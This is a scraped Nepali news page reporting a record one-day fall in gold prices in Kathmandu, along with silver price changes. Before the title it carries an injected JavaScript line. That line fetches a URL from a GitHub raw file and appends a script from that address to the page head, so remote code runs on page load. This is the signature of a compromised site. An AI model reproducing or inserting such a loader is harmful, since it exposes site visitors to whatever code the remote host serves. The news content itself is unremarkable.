;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सुनको मूल्यमा आजसम्माकै उच्च गिरावट् – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • सुनको मूल्यमा आजसम्माकै उच्च गिरावट्
अर्थ/वाणिज्य

सुनको मूल्यमा आजसम्माकै उच्च गिरावट्

सुनको भाउ

साउन २८।

काठमाडौं । आज सुनको मूल्य एकैदिन ६ हजार रुपैयाँले घटेको छ । हिजो एक लाख एक हजार ६ सयमा कारोबार भएको सुन ६ हजार दुई सयले घटेर ९५ हजार ४ सय कायम भएको सुनचाँदी व्यवसायी महासंघले जनाएको छ ।

आइतबारबाट यता सुनको मूल्य क्रमिक रुपमा ओरालो लाग्न सुरु गरेको थियो । यसअघि गत शुक्रबार सुनको मूल्य बढेर एक लाख तीन हजार पाँच सयसम्म पुगेको थियो ।

यस्तै आजै चाँदीको मूल्य तोलामा २ सय २५ रुपैयाँले घटेर १२ सय १० रुपैयाँ कायम भएको छ । हिजो चाँदी हालसम्मकै उच्च १४ सय ३५ रुपैयाँमा कारोबार भएको थियो । अन्तर्राष्ट्रिय बजारमा सुनचाँदीको मूल्यमा उतारचढाव आएसँगै स्थानीय बजारमा पनि सुनचाँदीको मूल्यमा फेरबदल आएको नेपाल सुनचाँदी व्यवसायी महासंघले जनाएको छ ।

अन्तराष्ट्रिय बजारमा यतिबेला सुन १८ सय ९१ डलरमा कारोबार भइरहेको छ ।file Photo

फेसबुक प्रतिक्रियाहरु